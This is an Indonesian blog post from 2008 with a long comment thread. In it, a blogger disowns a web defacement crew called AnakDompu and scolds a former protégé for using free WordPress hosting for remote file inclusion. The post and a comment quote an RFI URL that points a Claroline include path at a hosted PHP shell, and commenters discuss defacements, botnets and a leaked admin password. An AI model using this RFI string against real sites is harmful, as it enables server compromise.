Posted by: Black_Claw | May 12, 2008

AnakDompu apaan seh?

On 5/12/08, Micha** **** **** wrote:

Micha** **** **** wrote:
>
> Dear Mr. P*****A a.k.a Black_Claw a.k.a blaxnux,
> we would like to ask you a few details, about a group
> known as “AnakDompu”, which is somehow related to you.
> As you can also find in google, “AnakDompu” crew are
> are famous for web attacking most of russia and china site for
> past 6 months,including goverment sites. We are not
> judging since it is still unclear about it yet since
> the attacker IP seems diffrent from yours, but it is
> no doubt that the nick that you use are cleary seen
> on the hacked page. It maybe just a same handle, but
> during research, we also found that a few words also
> lead us to you. We hope that this is just a
> missunderstanding and we wait for your reply.
>
>
> Sincerely,
> Micha** **** ****

Loh, ada apa ini? Perasaan saya pernah denger masalah AnakDompu ini tapi dimana ya? Setahu saya hal yang berkaitan dengan AnakDompu ini adalah akun wotpres Rhakateza disaspen kemarin. Maka saya googling sajalah, dan saya menemukan ini :

Korespondensi Perusahaan
Nama: Tn. Furkan [Direktur/CEO/Manajer Umum]
E-mail:
Situs Web: http://anakdompu.blogspot.com
Pesan Instan

Nomer Telpon: 081804297445
Nomer Faks: —
Alamat: Jln. Merpati no 47 Dompu NTB
Dompu, Nusa Tenggara Barat
Indonesia

Sifat Dasar Usaha Jasa dari kategori Komputer & Software

Penjelasan Ringkas

AnakDompu merupakan Nama Sebuah Komunitas Yang Berasal Dari Dompu Nusa Tenggara Barat
AnakDompu Bergerak Dalam Bidang Teknologi Informasi. Merupakan Suatu Komunitas Yang di dalamnya terdapat Berbagai macam Suku Dan KOmunitas yang terpentuk Dengan Nama AnakDompu

Lah, ini sejak kapan si Ukang bikin perusahaan? Direktur pulak! Lah, tapi masak ini penyebabnya itu imel nowel-nowel saya. Kan tidak masuk akal. Tapi kemudian saya nemu yang ini :

http://cgaprogram.com/images/dompucrew.html

#AnakDompu @Dalnet 2008

AnakDompu

Greets

Shinchi, Black_Claw, silverx, Rhakateza, ab-enk, onny, [E]mine[M], Artexdabox , JaLi-, O_L_O, Slack-ware, jok3rsmd, H4ntu_Cyber, BeRgUnDaL, And All AnakDompu Crew

Special Thank’s to :

All Crew Chan : #AnakBatam, #sysHACK, #powHACK, #CR@CKER, #e-c-h-o, #yogyafree, #becak, #kuburan, #24jam, #jepang, #0-9

Kemudian yang ini :

http://www.matchent.com/wpress/?q=node/267

A bit better regarding the file cmd.txt which got a score of 11/32.
ClamAV calls this one PHP.Shell
I found one little piece of code in one of the files:
echo “AnakDompu“;
Which apparently leads to some Indonesian guys.
So I am a bit in doubt about who these guys are; Albanians, Russians, Turks or Indonesians?
AnakDompu gives some hits to pages apparently related to hacking, e.g. http://shinchi.wordpress.com/ , http://samada.wordpress.com/ , http://anakdompu.blogspot.com/ and http://anakdompu.wordpress.com/. And irc-channels on IndoIRC and DALnet.
l33t scriptkiddies who ruin other sites for fun? I think those days are over and most attacks nowadays are economically motivated.
It’s a dangerous world.

WTF! UKANG!!! Lah apa yang saya ajarkan dulu memangnya? Saya kira setelah nick Shinchi berhenti ngejar target nama di zone H semuanya sudah usai. Ternyata kok masih sama saja.
Lah macam ini seh malah menjelekkan nama daerah bapakmu namanya ndul. Cobak itu diselami kata-kata tuduhannya: “l33t scriptkiddies who ruin other sites for fun?” – “anak kecil nyekrip l33t yang menghancurkan situs demi kesenangan?”, dan lebih dari itu, saya dimasukkan dalam kategori tersebut karna saya “some Indonesian guys”? Aduhai, mohon maaf, sepertinya sudah lebih dari semilenium saya ninggalin yang namanya operasi plastik muka orang terus ditempelin nama saya buat senang-senang doang.

Saya memang nggak suci-suci amat dan ilmu saya jauh dibawah orang lain, tapi mbok ya setidaknya yang seperti itu tidak usah terlalu diumbarlah. Sudah cukup kegiatan corat-coret ini. Kalau kayak begini ya sampek hari kiamat juga yang kamu tau cuman RFI, LFI, sama EsKiEl. Kapan dewasanya? Masih banyak cara untuk mengangkat nama -atau mungkin di kasus kamu nama daerah- dengan cara yang lebih keren. Aktif di pengembangan opensors misalnya. Cobak walaupun kamu sama Ivan masih nguliah di jogja, bantulah saya gimana caranya supaya rotsow bisa kejadian di Dompu kek.

Tidak heran blog kamu disuspen, beserta semua yang lain yang ada di wotpres. Makanya baca itu TOA, nak. Baru kali ini saya melihat ada orang yang tega-teganya makek wotpres gretong untuk Remot Fail Inklusyen :

claroline/inc/claro_init_header.
inc.php?includePath=http://anakdompu.files.wordpress.com/2008/03/special.txt?

Ah, tapi kadang lucu juga melihatnya. Dompu, sebuah tempat fakir benwit yang bahkan nggak masuk di peta, yang dipandang rendah bahkan oleh kabupaten lain yang se-propinsi, bisa wira-wiri di kancah benwit kelas berat, dan parahnya, untuk bidang yang kurang baik pula…

Saya sering melihat langit Dompu dikala malam, jika tidak ada awan, jika langit tidak ditutupi apapun. Saya bisa melihat bintang. Saya bisa melihat horison. Saya kadang bahkan bisa menangkap kabut galaksi. Hal-hal yang sangat susah ditemui di langit di pulau Jawa. Membuat jika saya menyiulkan konserto eyecatch dari One More Time, One More Chance nya Byousoku 5cm, serasa daun mangga berubah menjadi kelopak bunga sakura yang jatuh bagaikan salju dengan kecepatan 5 sentimeter per detik…

Jadi kenapa harus memperburuk nama daerah yang bernaung dibawah langit seindah itu?


Responses

  1. weleh.. weleh….

    Like

  2. wew…lam kenal om..

    kenal ma furkan yang kuliah di UPN yogyakarta ya?

    kalo g salah saia sering liat nick black_claw di #mataram ma #anakdompu neh??

    Like

  3. wew, gw googleing lewat gugle manteb euy, cracking smoa :)) :)), mantap claw murid2 ente😀😀

    Like

  4. @ab-enk : Nggih om.😀 saya memang sering ke sana, cuman kalau untuk #anakdompu saya jarang masuk. Sejak cenel #dompu hilang, malas ngetik #anakdompu. Kepanjangan. Tapi kalau masuk cenel mataram sih is a must. Wakakakakakka=))!

    @adzie : Mantap apa ini kan sudah melanggar kode op konduk. Mana saya kok yang kena tegur pula. Kan ndak enak jadinya.

    Like

  5. weh, ente sdh cinta dompu rupanya😀

    Like

  6. wew, baru dapat infonya….
    Vandalisme berbau SARA.
    heheheh
    saya gak ikutan om….

    Like

  7. Wah Saia jujur gk pernah lakuin penyerangan? yang ngelakuin itu semua adalah bot?

    itu hasil deface awal tahun 2008, karena saia merasa dompu yang adalah channel saia itu di ambil alih oleh orang lain.

    Like

  8. Apa maksud kamu pakek tanda tanya? (?)
    Berarti kamu tidak yakin melakukan penyerangan?

    Dan plis deh. Dompu bukan cenel kamu.
    Founder dompu tahun 97 bukan kamu, saya tahu pasti.
    Lagipula yang di halaman pengrusakan itu #anakdompu, bukan #dompu.

    Dan yang perlu diperhatikan itu sebenarnya adalah menggunakan wp gretong untuk RFI :

    claroline/inc/claro_init_header.
    inc.php?includePath=http://anakdompu.files.wordpress.com/2008/03/special.txt?

    Like

  9. iyah saya jg yang menjalankan botnya. tapi sourcenya saya sebar luarkan di blog.

    di blog itu saya masukkan sourcenya agar bisa di download, tapi orang2 malah menggunakan itu untuk injekan di bot.

    Like

  10. ada2 saja kalian ini…(geleng2..)

    Like

  11. WTF. Sebar Luarkan? Kosakata dari mana itu?

    Kamu itu tidak konsisten. Pertama kamu bilang :

    Wah Saia jujur gk pernah lakuin penyerangan? yang ngelakuin itu semua adalah bot?

    Tapi kemudian kamu bilang lagi :

    yah saya jg yang menjalankan botnya.

    Ya sama saja ente yang melakukan penyerangan ndulz.

    tapi sourcenya saya sebar luarkan di blog.

    di blog itu saya masukkan sourcenya agar bisa di download, tapi orang2 malah menggunakan itu untuk injekan di bot.

    WTF. Sudah dikatakan oleh wp untuk tidak mengaplot konten seperti itu. Lagipula sors yang kamu kasih sudah bukan sors murni lagi karna sudah kamu isi dengan target. Ini yang salah. Kalau publis sors, target harus pure, harus kosong.

    Sedangkan kamu karna kamu mengisi string target sudah masukin nama sebagai modifier, bahkan kadang menghapus nama asli pembuat kode.
    Itu bukan modifikasi kalau cuman nambah string target mah.

    Memasukkan string target dan list bug pada kode sors txt yang diaplot di blog mah sama saja dengan mengundang orang untuk rfi langsung dengan url sors.

    Like

  12. ya ampun…
    saya nggak ikut-ikutan!!!

    btw, blek yakin lu nggak terlibat! jadi yang dulu tengah malem tiba2 ngasih password admin situs joomla jerman siap untuk dideface untuk ayanami itu siapa ya?

    Like

  13. mau dong jadi muridnya🙂

    Like

  14. wah…wah… aseli parah😛

    hebattttt pak farhan

    Like

  15. salut deh ma bleq,maju terussssssssss

    Like

  16. wew, jd sebenernya sapa yg ngejalanin ntu bot😀

    ga ngikut2 deh blek😀😀

    Like

  17. Ah, tu imel paling hoax…..

    kaboor………!!!!!

    Like

  18. @boku_baka : joih bud. kan yang ngedefes dengan tulisan ayanami ente, betul kagak?
    en luuk wus tolking. Saudara Budiyono, anda pernah melepas sandal dan masuk tanpa izin ke blog saya kemudian melakukan defes dengan halaman boku_baka was here, kemudian anda masuk tanpa izin sekali lagi dan menghapus halaman tersebut. Terakhir anda masuk tanpa izin dan menonton BYOUSOKU 11KM yang belum dipublish. Plis deh ker!

    @alie+oto = eh, salut atas apa woi! ini bukan prestasi atau prestise.

    Like

  19. boku_baka: jadi udah berapa situs korban dari dompu?
    black_claw: lah, saya serius ini.
    black_claw: saat saya aktif dulu saya tidak mengatasnamakan dompu.
    boku_baka: terserah siapa namanya
    boku_baka: jadi ada berapa situs yang tumbang?
    black_claw: pokoknya garis bawahi, bukan saya yang melakukan ya.
    boku_baka: ya ya ya
    boku_baka: saya percaya
    boku_baka: jadi situsnya mana saja?
    black_claw: **** situs dalam ******** terakhir.
    black_claw: *** mati karna dijadikan sarang bot dan server irc.
    boku_baka: hmm itu kamunya ngapain?
    boku_baka: katanya waktu kamu masih aktif
    black_claw: ndak kok.
    black_claw: saya sudah lama tidak operasi plastik.
    black_claw: kan ente yang operasi plastik situs jerman.
    black_claw: blog saya juga ente operasi dengan boku baka was here
    boku_baka: saya tanya pas dulu sampeyan aktif
    boku_baka: defacenya ngapain aja
    boku_baka: tulisannya apa?
    boku_baka: black_claw was here?
    black_claw: oh, pas saya aktif. saya kira yang baru2 ini.
    black_claw: kalau yang baru2 ini sampek *** itu.
    boku_baka: lha yang pas sampeyan aktif?
    black_claw: sedikitlah. namanya saja taon 90an.
    black_claw: dan itu juga punya temen2 sendiri.
    black_claw: jadi bukan random target.
    black_claw: jadi ndak ada unsur jahatnya.
    black_claw: jadi saya memang murni tidak bersalah.
    boku_baka: hmm.. jadi pernah ya
    boku_baka: soal bersalah atau tidak, biarkan publik yang menilai

    maaf bud, komen ente saya sensor pada bagian yang menunjukkan angka. setidaknya ini lebih baik ketimbang ente yang ngapus komen saya di blog ente 2 kali.

    Like

  20. Kenapa jawaban saya setelah itu tidak ditaruh?
    Lagipula ente sudah bilang tidak akan dipublish.
    Saya saja tidak pernah mempublish log-log cet anda.
    Apa maksudnya ini?

    Kok dipangkas sedemikian rupa supaya saya terkesan buruk.
    Bukankah pembicaraan sebelumnya :

    Budiyono .: saya ndak ngelog chat kok, kecuali sama nindy
    Budiyono .: silakahkan melakukan pengakuan
    Budiyono .: sama saya santai saja
    Black_Claw: pengakuan terhadap apa?
    Budiyono .: jadi udah berapa situs korban dari dompu?
    Black_Claw: lah, saya serius ini.

    kemudian akhir pembicaraan :

    Black_Claw: publik tidak pernah menilai saya bersalah.
    Black_Claw: jadi saya memang tidak bersalah.
    Black_Claw: dan plis deh, ente itu orang swasta. jangan gunakan gaya bicara kepala dinas saya,
    Budiyono .: soalnya biar berkesan wawancara blek
    Budiyono .: hehehehe
    Black_Claw: kalok wawancara berarti ente ngelog dong?
    Black_Claw: dasar heker bangsat.
    Budiyono .: kagak ngelog
    Budiyono .: sumpah

    Apa yang saya lakukan dulu itu tidak lain main2 sama teman. Maen-maen nangkep kotak, jadi sama-sama atas sepengetahuan bahwa akan war. Publik tentunya hanya sebatas teman-teman saya saja, karna memang hanya itulah publik atas kegiatan senang-senang itu.

    Lagipula permasalahannya adalah SEKARANG. Bukan DULU.

    Ente ini nggak konsisten sama stetmen ente. Katanya :

    Budiyono .: aku ini udah *.*, ****** parah, ****** dsb.. dsb..
    Budiyono .: kalau nggak bisa dipercaya, apalagi yang aku punya.?

    Sekarang, dengan apa yang ente lakukan, bagaimana orang bisa mempercayai?

    Like

  21. Langit Dompu memang indah…… lebih indah lagi kalau tengah berduaan, bermesraan dan akhirnya…… ah sudahlah…… nanti salah2 malah terjerat UU ITE yang baru lagi!:mrgreen:

    Like

  22. loh memang saya nggak ngelog, saya langsung kopas…

    eh lagian ngapain ini saya repot2 ikut2an? kok jadinya kesannya saya terlibat.. saya warga internet yang teladan™

    beeuhhhh… saya pamit!
    sayonara!

    Like

  23. log adalah simpanan hasil.
    Ente menyimpan dengan melakukan kopas, dengan target simpanan adalah komen di blog saya.
    Ente selalu mendengungkan hebatnya pendidikan di barat, tapi hasilnya?
    Sungguh disayangkan.
    Meninggalkan setelah melakukan memang hanya bisa dilakukan oleh para penyebar benih yang tidak bertanggung jawab.

    Like

  24. HE, sudah sudah, jangan bercinta didepan publik, ntar om jiro ngambek lagi ama ente..

    *ngabursejauhmungkin*

    Like

  25. walah… wis emboh, masalahnya aku abukan anak dompu

    Like

  26. hanjrit…..pusing gw, serasa baca log……

    btw, jangan salahkan Dompu, salahkan homok Dompu yang terdampar di ID-GMail….wakakakakakakakak

    *kabur,unplug UTP,matiin kompie*

    Like

  27. ampun di…
    loh.. ya salah ya…?

    Like

  28. bahaya…… bahaya….
    penduduk Dompu ngungsi segera!!!!

    Like

  29. (^_^)7

    Like

  30. kaka blek…ajarin juga dong… ntar dibeliin sos** dingin lagi…🙂

    Like

  31. ANJRIT WAKAKAKAKAKKAKAAKKAKAKAKAKAKAKK!!!!

    *bakar bakar warung sate bulayak*

    Like

  32. tobat nasuha…jangan berperang lagi..ntar Bupatinya saya undang untuk ngedamaiin..:)

    Like

  33. BBM naik….
    pemerintah tangkap demonstran….
    BLT gak tepat sasaran….
    Kepala daerah korupsi….
    Pil-kadal penuh kecurangan….
    heker diburu interpol….
    Indunesia oh Indunesia….

    Like

  34. JADI KAN BEGINI BLEK…

    eh, tadi di atas pada ngomongin apaan sih?
    *gak ngerti*
    tapi satu yg pasti, janganlah pulak gara-gara shinichi kamu dan boku baka berantem. atau saya salah? ini ungkapan “rasa” antara 2 merpati?
    *kabur*

    Like

  35. om abe???
    aseli nih???
    kemane aje lo™ ???
    jadi ngelahirin anak kedua???
    *sembunyi di belakang BTS*

    Like

  36. lah, ente yang kemane aje yan…
    btw, be… budi itu bukan merpati. budi itu kasuari…

    Like

  37. @cingi-canga
    Uhm, saya pergi betapa melatih elmu kanuragan saya. Plus saya juga berusaha men-tegap-kan badan yg bulet ini. *kalau percaya pindah agama*
    🙂

    Like

  38. blek..blek daripada begini pan mendingan ngoprek yang lain yang lebih mangfaat gitu lho contohnya dagang HD😀

    btw buswey kalau nemu kelemahan web (apalagi pemerintah) biasanya lu sampein ke adminnya ndak?

    Like

  39. eh saya ndak ngoprek index php atau index htm woi!!!
    dan dagang hdd juga ndak ada yang mau beli disini kecuali saya sendiri =))

    sampein ke admin juga kadang nggak nyampe, emailnya sering kuota eksid dia. =))
    Tapi diusahakan doms lah.. Kadang diupahin ssh. =))

    Like

  40. EARNING MONEY ONLINE
    Be able to earn as much as $150 Within 30 Days,Affiliate Marketing is the only way to earn a substantial income online, working from the comfort of your own home. Affiliate Marketing allows you to earn high income by promoting other people’s products and services online

    Like

  41. Somehow i missed the point. Probably lost in translation🙂 Anyway … nice blog to visit.

    cheers, Kermes.

    Like

  42. Thank you.🙂
    Nah, it is just about some missunderstanding between a group, me, and a guy.😀

    Like

  43. You’ve opened a new tab

    With tabs you can:
    Use one Internet Explorer window to view all your webpages.
    Open links in a background tab while viewing the page you’re on.
    Save and open multiple webpages at once by using favorites and home page tabs.

    To get started:
    Press the CTRL key while clicking links (or use the middle mouse button).
    Click any tab with the middle mouse button to close it.
    Press ALT+ENTER from the address bar or search box to open the result in a new tab.

    Learn more about tabs

    Show more tab shortcuts

    Keyboard shortcuts Open links in a new tab in the background CTRL+click
    Open links in a new tab in the foreground CTRL+SHIFT+click
    Open a new tab in the foreground CTRL+T
    Open a new tab from the Address bar ALT+ENTER
    Open a new tab from the search box ALT+ENTER
    Open Quick Tabs (thumbnail view) CTRL+Q
    Switch between tabs CTRL+TAB/CTRL+SHIFT+TAB
    Switch to a specific tab number CTRL+n (n can be 1-8)
    Switch to the last tab CTRL+9
    Close current tab CTRL+W
    Close all tabs ALT+F4
    Close other tabs CTRL+ALT+F4

    Mouse shortcuts Open a link in a background tab Click the middle mouse button on a link
    Open a new tab Double-click the empty space to the right of the last tab
    Close a tab Click the middle mouse button on the tab

    Don’t show this page again Close

    Like

  44. duh…ad yang bisa bantuin menemukan alamat di dompu tidak??????????

    Like

  45. wah capek juga baca dari atas…..akhirnya selesai juga….ya semoga kejadian ini ga terulang lagi kasian dana dompu dan semuanya baik-baik saja

    *salam dari pemula*

    Like

  46. Assalamuaikum Om Blek.

    Salam Buat Sa’e², Ari² Di Dompu N Siwe²😀

    *instirahat sejenak, sambil memandang bintang di langit*

    Like

  47. 😀

    Like

  48. alamat dimana boss apple?

    Like

  49. 🙂 seru banget nih… hihihi guru vs murid nih.. jauh mata memandang tidak sejauh paket yang terkirim didunia maya kakaka

    Ada-ada aja
    stop RFI!!!
    stop LFI!!
    stop SQL Inj!

    Lets to make a bitch code kakaka

    Like

  50. keren……
    sudah terkenal sekarang chichi….

    Like

  51. serem… masih juga cari nama lewat deface.😀 keren ntar kemataram pasti jadi terkenal. Jadi kepala IT Kantor gubernuran. Sapa sih yang ga kenal nick XXX yang sudah bobol ribuan situs dengan memberi label XXX. Keren….. ikutan belajar dong. Biar ikut2an naek daun

    Like

  52. wah wah wah….ketinggalan obrolan seru saia ini….
    ndak usah lah ribut2 lagi…toh guru sama murid…

    la wong kalian itu sama2 pinter…
    ya mending mikirin gimana kemajuan IT di dompu sama bima…….
    nah itu buktinya,udah ada anak dompu yang bisa “kelayapan” di server2 luar negeri….apa ndak hebat namanya.:mrgreen:

    Like


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Categories

%d bloggers like this: